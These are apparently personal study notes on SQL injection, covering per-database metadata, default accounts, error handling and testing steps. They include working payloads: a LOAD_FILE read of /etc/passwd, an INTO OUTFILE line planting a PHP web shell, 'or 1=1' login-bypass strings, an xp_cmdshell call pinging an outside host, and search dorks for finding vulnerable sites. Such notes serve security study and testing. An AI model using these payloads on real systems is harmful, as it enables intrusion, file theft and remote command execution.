SQL Injection

##################################################### ## == SQL Injection: Attack & Defence Notes == ## #####################################################

Space -

|| - , - . - */ - ' - " -

• The pipe | char can be used to append a function to a value. The function will be executed and the result cast and catted. Ex: http://www.victim.com/id=1||utl_inaddr.get_host_address(local)
• An asterisk followed by a forward slash can be used to terminate a comment and/or 'optimizer hint' in Oracle. Ex: http://www.vimtim.com/hint=*/ from dual

LOAD_FILE -- reads a file returns its contains as a string.

• calling user must have FILE privilege (in SQL).
• If quotes are escaped or validated by the server, try numbers.
• The 1 in this case doesn't need quotes, b/c that would be string.

Ex: 1 UNION ALL SELECT LOAD_FILE('/etc/passwd')

TIp:

Can write out to a file with SQL:

• Ex: 1 UNION SELECT "<? system($_REQUEST['cmd'); ?>" INTO OUTFILE "/var/www/html/victim.com/cmd.php"
• Both LOAD_FILE and SELECT INTO OUTFILE commands need MySQL user permissions for FILE.

• A cleaner discription of the SQL executed:

      SELECT * FROM TABLE
      WHERE
      USERID = 1 UNION ALL SELECT LOAD_FILE('/etc/passwd')
  

MicroSoft SQL:

default accts:

• the 'sa' account (system admin) Metadata:
• INFORMATION_SCHEMA exists, and also system tables:
  • sysobjects, sysindexkeys, sysindexes, syscolumns, systypes, etc.
  • Also accessed by sytem stored procedures: SQL Srv 2005+ ^ catalog views called "sys.*". All users can view all tables.

MySQL:

default accts:

• 'root' and 'anonymous' accounts Metadata:
• in virtual database called INFORMATION_SCHEMA
• cmds are (version 5.0+):
  • SHOW DATABASES;
  • SHOW TABLES;

Oracle:

default accts:

• SYS, SYSTEM, DBSNMP and OUTLN
• Orcale on Windows HAS TO BE run as the SYSTEM privlege acct. Metadata:
• built-in views: ALL_TABLES, ALL_TAB_COLUMNS, etc. views prefixed with USERS_ show objects owned by user. prefix of DBA_ shows all objects in the database.

NB: - There are lots more, and sometimes default passwords.

• ACL's have defaults too, for deny, grant access to data and/or the exection of built-in stored procedures and/or functions. Ex: xp_cmdshell, OPENROWSET, LOAD_FILE, ActiveX and Java, etc. (See chap. 4 thru 7)

-- Oracle statement to enumerate all accessible tables for current user: SELECT OWNER, TABLE_NAME FROM ALL_TABLES ORDER BY TABLE_NAME; -- MySQL statement to enumerate all accessible tables and databases for -- the current user: SELECT table_schema, table_name FROM information_schema.tables; -- MS SQL statement to enumerate all accessible tables using the system -- tables: SELECT name FROM sysobjects WHERE xtype = 'U'; -- MS SQL statement to enumerate all accessible tables using the catalog -- views: SELECT name FROM sys.tables;

NB: - Not passible to hide or revoke access to INFORMATION_SCHEMA

virtual database within MySQL.

• Not possible to hide or revoke access to the 'data dictionary' within Oracle, as it is a view. "You can modify the view to restrict access, but Oracle does not recommend this." [1]
• It IS possible to revoke access to INFORMATION_SCHEMA, system, and sys.* tables within MS SQL Server. This can case brakage.

BP: - Do it least privilege via the application, seprate privileged

roles and functions.

Rules: Things you know, find out:

1. You identify all the data entry on the Web application.
2. You know what kind of request might trigger anomalies.
3. You detect anomalies in the response from the server.

Inputs to a Server:

• GET, POSTS, Cookies.
• Headers: Host, Referer, and User-Agent may hit the db, but this is less common. Ex: some the info to create graphs and stats.

Try these! If the two requests act the same, could be a vuln. For MS-SQL and Oracle: http://www.victim.com/showproducts.php?category=bikes http://www.victim.com/showproducts.php?category=bi'+'kes For MySQL: http://www.victim.com/showproducts.php?category=bikes http://www.victim.com/showproducts.php?category=bi' 'kes

## READ THIS for Error Results ##

Results from script logic and Web server receiving an db error: One of 5 things:

1. The SQL error is displayed on the page and is visible to the user from the Web browser.
2. The SQL error is hidden in the SOURCE of the Webpage for debugging purposes.
3. REDIRECTION to another page is used when an error is detected.
4. An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302 is returned.
5. The application handles the error properly and simply shows no results, perhaps displaying a generic error page.

## End of Error Results ## NB: (quote) Ability to identify the remote database is paramount to

successfully progressing the attack and moving on to further exploitation. (/quote)

####################################################### ## More Random Info about SQLi ## #######################################################

Search google for these SQL Injection Vulnerable Dorks:

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:pageid=

' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi-colon ends the last SQL query and starts a new one. Setup a server at 10.10.1.2 and check if it receives a ICMP packet:

1. tcpdump icmp

If no ping, administrator has limited Web User access to these stored procedures.